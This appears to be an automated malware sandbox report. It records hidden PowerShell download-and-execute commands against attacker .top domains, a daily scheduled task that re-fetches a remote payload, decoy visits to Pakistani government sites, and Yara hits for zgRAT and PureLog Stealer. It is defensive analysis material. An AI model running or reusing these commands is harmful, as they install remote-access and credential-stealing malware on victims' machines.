                                                                                                                                                                    2024-09-30 16:58:37 UTC1369INData Raw: 53 5e 69 4f 64 58 70 5e 50 41 43 67 45 5e 41 77 41 47 4b 5e 67 41 36 4b 77 5e 55 6f 56 36 4a 5e 78 57 41 41 6f 5e 6f 77 4d 41 42 5e 69 6f 41 53 69 5e 73 46 4b 4c 48 5e 6a 42 6c 59 41 5e 2f 67 6b 41 41 5e 43 69 70 41 51 5e 41 47 4b 67 42 5e 43 4b 77 55 6f 5e 34 73 6b 78 56 5e 33 34 4d 41 41 5e 41 45 46 50 34 5e 42 4b 67 41 41 5e 41 44 59 72 42 5e 53 69 4c 48 42 5e 59 31 66 67 77 5e 41 41 41 51 71 5e 41 41 42 4b 4b 5e 77 55 6f 50 66 5e 64 79 4e 41 44 5e 2b 43 51 41 41 5e 4b 4a 30 42 41 5e 41 59 71 41 42 5e 4d 77 42 41 42 5e 6e 41 51 41 41 5e 42 41 41 41 45 5e 53 73 46 4b 47 5e 74 58 52 54 41 5e 67 42 41 41 41 5e 41 50 34 4f 41 5e 41 41 34 41 41 5e 41 41 41 50 34 5e 4d 41 41 42 46 5e 43 51 41 41 41 5e 41 55 41 41 41 5e 42 48 41 41 41 5e 41 36 51 41 41 5e 41
                                                                                                                                                                    Data Ascii: S^iOdXp^PACgE^AwAGK^gA6Kw^UoV6J^xWAAo^owMAB^ioASi^sFKLH^jBlYA^/gkAA^CipAQ^AGKgB^CKwUo^4skxV^34MAA^AEFP4^BKgAA^ADYrB^SiLHB^Y1fgw^AAAQq^AABKK^wUoPf^dyNAD^+CQAA^KJ0BA^AYqAB^MwBAB^nAQAA^BAAAE^SsFKG^tXRTA^gBAAA^AP4OA^AA4AA^AAAP4^MAABF^CQAAA^AUAAA^BHAAA^A6QAA^A
                                                                                                                                                                    2024-09-30 16:58:37 UTC1369INData Raw: 5e 52 37 51 67 49 5e 41 42 44 6b 51 5e 2f 2f 2f 2f 4a 5e 69 41 45 41 41 5e 41 41 4f 41 58 5e 2f 2f 2f 38 52 5e 41 43 67 72 41 5e 41 41 47 4a 53 5e 59 54 42 43 41 5e 43 41 41 41 41 5e 4f 50 44 2b 2f 5e 2f 38 41 41 41 5e 41 54 4d 41 55 5e 41 63 51 45 41 5e 41 41 59 41 41 5e 42 45 72 42 53 5e 69 6a 62 7a 68 5e 6a 49 41 67 41 5e 41 41 44 2b 44 5e 67 49 41 4f 41 5e 41 41 41 41 44 5e 2b 44 41 49 41 5e 52 51 6f 41 41 5e 41 44 61 41 41 5e 41 41 46 77 45 5e 41 41 46 41 41 5e 41 41 41 46 41 5e 41 41 41 6b 67 5e 41 41 41 4c 59 5e 41 41 41 44 75 5e 41 41 41 41 47 5e 77 41 41 41 44 5e 63 41 41 41 42 5e 69 41 41 41 41 5e 4f 4e 55 41 41 5e 41 41 52 41 42 5e 38 6d 6a 43 63 5e 41 41 41 45 66 5e 4a 6f 77 6e 41 5e 41 41 42 4b 43 5e 38 41 41 41 59 5e 71 45 51 41 66 5e 4c 48
                                                                                                                                                                    Data Ascii: ^R7QgI^ABDkQ^////J^iAEAA^AAOAX^///8R^ACgrA^AAGJS^YTBCA^CAAAA^OPD+/^/8AAA^ATMAU^AcQEA^AAYAA^BErBS^ijbzh^jIAgA^AAD+D^gIAOA^AAAAD^+DAIA^RQoAA^ADaAA^AAFwE^AAFAA^AAAFA^AAAkg^AAALY^AAADu^AAAAG^wAAAD^cAAAB^iAAAA^ONUAA^AARAB^8mjCc^AAAEf^JownA^AABKC^8AAAY^qEQAf^LH
                                                                                                                                                                    2024-09-30 16:58:37 UTC1369INData Raw: 6a 2b 2f 2f 38 5e 52 41 78 45 45 5e 4b 47 38 43 41 5e 41 59 6c 4a 6d 5e 6b 2f 79 66 2f 5e 2f 2f 79 41 4d 5e 41 41 41 41 4f 5e 46 33 2b 2f 2f 5e 38 52 41 41 4e 5e 2b 62 67 49 41 5e 42 43 68 4d 43 5e 41 41 47 4b 44 5e 41 41 41 41 59 5e 6c 4a 6a 70 73 5e 41 41 41 41 49 5e 41 30 41 41 41 5e 41 34 4f 76 37 5e 2f 2f 78 74 46 5e 41 51 41 41 41 5e 50 62 2f 2f 2f 5e 38 67 42 51 41 5e 41 41 48 34 53 5e 41 67 41 45 65 5e 30 30 43 41 41 5e 51 36 48 50 37 5e 2f 2f 79 59 67 5e 42 67 41 41 41 5e 44 67 52 2f 76 5e 2f 2f 47 45 55 5e 42 41 41 41 41 5e 39 76 2f 2f 2f 5e 79 41 49 41 41 5e 41 41 4f 50 33 5e 39 2f 2f 38 58 5e 4f 61 2f 2b 2f 5e 2f 38 67 41 77 5e 41 41 41 48 34 5e 53 41 67 41 45 5e 65 2b 67 42 41 5e 41 51 35 34 2f 5e 33 2f 2f 79 59 5e 67 42 51 41 41 5e 41 44 6a
                                                                                                                                                                    Data Ascii: j+//8^RAxEE^KG8CA^AYlJm^k/yf/^//yAM^AAAAO^F3+//^8RAAN^+bgIA^BChMC^AAGKD^AAAAY^lJjps^AAAAI^A0AAA^A4Ov7^//xtF^AQAAA^Pb///^8gBQA^AAH4S^AgAEe^00CAA^Q6HP7^//yYg^BgAAA^DgR/v^//GEU^BAAAA^9v///^yAIAA^AAOP3^9//8X^Oa/+/^/8gAw^AAAH4^SAgAE^e+gBA^AQ54/^3//yY^gBQAA^ADj
                                                                                                                                                                    2024-09-30 16:58:37 UTC1369INData Raw: 41 42 69 55 5e 6d 66 52 59 41 5e 41 41 51 67 41 5e 51 41 41 41 48 5e 34 53 41 67 41 5e 45 65 31 4d 43 5e 41 41 51 36 4a 5e 2f 2f 2f 2f 79 5e 59 67 41 77 41 5e 41 41 44 67 63 5e 2f 2f 2f 2f 41 5e 41 41 41 45 7a 5e 41 45 41 4f 67 5e 41 41 41 41 4a 5e 41 41 41 52 4b 5e 77 55 6f 51 37 5e 70 6e 53 79 41 5e 42 41 41 41 41 5e 2f 67 34 41 41 5e 44 67 41 41 41 5e 41 41 2f 67 77 5e 41 41 45 55 47 5e 41 41 41 41 6f 5e 41 41 41 41 46 5e 77 41 41 41 43 5e 4f 41 41 41 41 5e 4c 77 41 41 41 5e 42 63 41 41 41 5e 41 46 41 41 41 5e 41 4f 4a 73 41 5e 41 41 41 53 41 5e 51 4e 39 48 51 5e 41 41 42 43 41 5e 45 41 41 41 41 5e 4f 4d 7a 2f 2f 5e 2f 38 53 41 52 5e 38 4d 4b 44 30 5e 41 41 41 5a 39 5e 47 67 41 41 42 5e 43 41 44 41 41 5e 41 41 4f 4c 54 5e 2f 2f 2f 38 53 5e 41 58 77 62
                                                                                                                                                                    Data Ascii: ABiU^mfRYA^AAQgA^QAAAH^4SAgA^Ee1MC^AAQ6J^////y^YgAwA^AADgc^////A^AAAEz^AEAOg^AAAAJ^AAARK^wUoQ7^pnSyA^BAAAA^/g4AA^DgAAA^AA/gw^AAEUG^AAAAo^AAAAF^wAAAC^OAAAA^LwAAA^BcAAA^AFAAA^AOJsA^AAASA^QN9HQ^AABCA^EAAAA^OMz//^/8SAR^8MKD0^AAAZ9^GgAAB^CADAA^AAOLT^///8S^AXwb


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.749724162.159.135.2344438136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-09-30 16:58:41 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                                                                                                                                                    Connection: Upgrade,Keep-Alive
                                                                                                                                                                    Upgrade: websocket
                                                                                                                                                                    Sec-WebSocket-Key: 0h1HX+d4bLFaNYIrsTupkQ==
                                                                                                                                                                    Sec-WebSocket-Version: 13
                                                                                                                                                                    Host: gateway.discord.gg
                                                                                                                                                                    2024-09-30 16:58:41 UTC612INHTTP/1.1 404 Not Found
                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:58:41 GMT
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Connection: close
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5t5gXkthIkgQZWWQwCczNmQmbGxiddKQM2myo9PGXpxLUu22LuY8NQZhUlpsHtp7vfKIoJISDOYTJCrNMyW0SMpVO3JGFxntGFzGAeMvor%2Bd5ELnlKkxj05pgz6%2BAU2v27VHLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8cb5c258ea3c4315-EWR


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.74972552.165.165.26443
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-09-30 16:59:14 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+RXM+ul9gZsDE19&MD=3r6m3nSv HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                    2024-09-30 16:59:14 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Expires: -1
                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                    MS-CorrelationId: f942d7a8-254d-4f78-ad56-a6123ffd0bd1
                                                                                                                                                                    MS-RequestId: f48d1eb4-0f5c-4dc6-a9bc-d5a6a60169bf
                                                                                                                                                                    MS-CV: sqvNj9r2MUGsszJ8.0
                                                                                                                                                                    X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:59:14 GMT
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Length: 30005
                                                                                                                                                                    2024-09-30 16:59:14 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                    2024-09-30 16:59:14 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:12:58:17
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell
                                                                                                                                                                    Imagebase:0x7ff741d30000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:12:58:17
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:12:58:19
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Windows\system32\PING.EXE" www.nadra.gov.pk
                                                                                                                                                                    Imagebase:0x7ff789650000
                                                                                                                                                                    File size:22'528 bytes
                                                                                                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:12:58:22
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\nslookup.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Windows\system32\nslookup.exe" www.yahoo.com
                                                                                                                                                                    Imagebase:0x7ff74a710000
                                                                                                                                                                    File size:89'600 bytes
                                                                                                                                                                    MD5 hash:F2E3950C1023ACF80765C918791999C0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:12:58:22
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\nslookup.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Windows\system32\nslookup.exe" www.protonmail.com
                                                                                                                                                                    Imagebase:0x7ff74a710000
                                                                                                                                                                    File size:89'600 bytes
                                                                                                                                                                    MD5 hash:F2E3950C1023ACF80765C918791999C0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:12:58:24
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404
                                                                                                                                                                    Imagebase:0x7ff6c4390000
                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:12:58:24
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                    Imagebase:0x7ff7b4ee0000
                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:12:58:24
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1916,i,14445282091827991487,7005601379036879201,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                    Imagebase:0x7ff6c4390000
                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:12:58:26
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                                    Imagebase:0x7ff741d30000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:12:58:28
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /k schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f
                                                                                                                                                                    Imagebase:0x7ff6c2250000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:12:58:28
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f
                                                                                                                                                                    Imagebase:0x7ff6effe0000
                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:12:58:29
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell
                                                                                                                                                                    Imagebase:0x7ff741d30000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:12:58:29
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:12:58:33
                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                                    Imagebase:0x7ff741d30000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFAAC4963AC Relevance: 3.0, Strings: 2, Instructions: 520COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.3902397772.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffaac490000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 6$0W
                                                                                                                                                                      • API String ID: 0-2121892255
                                                                                                                                                                      • Opcode ID: 99571302edaec71c961f56d74325faeed6351d703322d3b18eb7f7492c107295
                                                                                                                                                                      • Instruction ID: 415f81a21eaf330a7f78e93734a9ec0a6120a7ccaa248000ee3253ee33f6ccb5
                                                                                                                                                                      • Opcode Fuzzy Hash: 99571302edaec71c961f56d74325faeed6351d703322d3b18eb7f7492c107295
                                                                                                                                                                      • Instruction Fuzzy Hash: A7F15265A0D6568BF398A728C45A7B977C2EF96318F14C4B9D48EC72C3DD1EEC068381
                                                                                                                                                                      Function 00007FFAAC560004 Relevance: .4, Instructions: 391COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.3903243488.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffaac560000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 257b5c91f827145ffddc9497be84f568bd3f53a666b79bdb47f0844f18430c08
                                                                                                                                                                      • Instruction ID: ae3deb2fd76a9bf56361a0926e61af42b98f7aebacdebce5bb421297ce1f011f
                                                                                                                                                                      • Opcode Fuzzy Hash: 257b5c91f827145ffddc9497be84f568bd3f53a666b79bdb47f0844f18430c08
                                                                                                                                                                      • Instruction Fuzzy Hash: 29B1D162A4E7C68FE75787688865560BFE4DFA7210B0D81FBD08DCB1A3D918DC0AC395
                                                                                                                                                                      Function 00007FFAAC4948E0 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.3902397772.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffaac490000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0e23a14620b8f7f39f9c74cad8a8cde8f9862b1d28b8a32485721c0b13460632
                                                                                                                                                                      • Instruction ID: b1485e002362881a029b091eebfff68bcd0305d0651adcd4fa5fc8f1309ec667
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e23a14620b8f7f39f9c74cad8a8cde8f9862b1d28b8a32485721c0b13460632
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A51B457B496B20AE30173BCF8655E96B90DF82376708C2B7D2CDCE2A39C19144A83E5
